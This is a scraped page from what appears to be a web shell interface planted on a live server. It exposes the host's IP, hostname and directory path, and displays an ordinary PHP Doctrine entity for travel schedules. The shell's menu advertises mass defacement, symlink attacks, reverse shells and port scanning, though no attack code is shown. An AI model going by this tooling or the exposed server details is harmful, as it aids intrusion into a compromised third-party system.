ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Entity
/
Viewing: Schedule.php
<?php namespace AppBundle\Entity; use JMS\Serializer\Annotation\Type; use Doctrine\ORM\Mapping as ORM; use JMS\Serializer\Annotation as Serializer; /** * Schedule * * @ORM\Table(name="schedule") * @ORM\Entity(repositoryClass="AppBundle\Repository\ScheduleRepository") */ class Schedule { /** * @var int * * @ORM\Column(name="id", type="integer") * @ORM\Id * @ORM\GeneratedValue(strategy="AUTO") * @Serializer\Groups({"LIST", "SCHEDULE_DETAILS", "AGENCY_DETAILS"}) */ private $scheduleId; /** * This value represents the depart time in format Hours:minutes * * @var \DateTime * * @ORM\Column(name="depart_time", type="datetime") * @Type("DateTime<'H:i'>") * @Serializer\Groups({"LIST","SCHEDULE_DETAILS", "AGENCY_DETAILS", "TRAVEL_DETAILS"}) */ private $departTime; /** * @var AppBundle\Entity\Agency * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\Agency", inversedBy="schedules") * @ORM\JoinColumn(nullable=false) * @Serializer\Groups({"LIST","SCHEDULE_DETAILS", "TRAVEL_CONFIG_DETAILS"}) * @Serializer\MaxDepth(2) */ private $agency; /** * @var bool * * @ORM\Column(name="active", type="boolean", * options = { * "default" : true * } * ) * @Serializer\Groups({"SCHEDULE_DETAILS"}) */ private $active = true; /** * Get scheduleId * * @return integer */ public function getScheduleId() { return $this->scheduleId; } /** * Set departTime * * @param \DateTime $departTime * * @return Schedule */ public function setDepartTime($departTime) { $this->departTime = $departTime; return $this; } /** * Get departTime * * @return \DateTime */ public function getDepartTime() { return $this->departTime; } /** * Set agency * * @param \AppBundle\Entity\Agency $agency * * @return Schedule */ public function setAgency(\AppBundle\Entity\Agency $agency) { $this->agency = $agency; return $this; } /** * Get agency * * @return \AppBundle\Entity\Agency */ public function getAgency() { return $this->agency; } /** * Set active * * @param boolean $active * * @return Schedule */ public function setActive($active) { $this->active = $active; return $this; } /** * Get active * * @return boolean */ public function getActive() { return $this->active; } }
Coded With 💗 by
0x6ick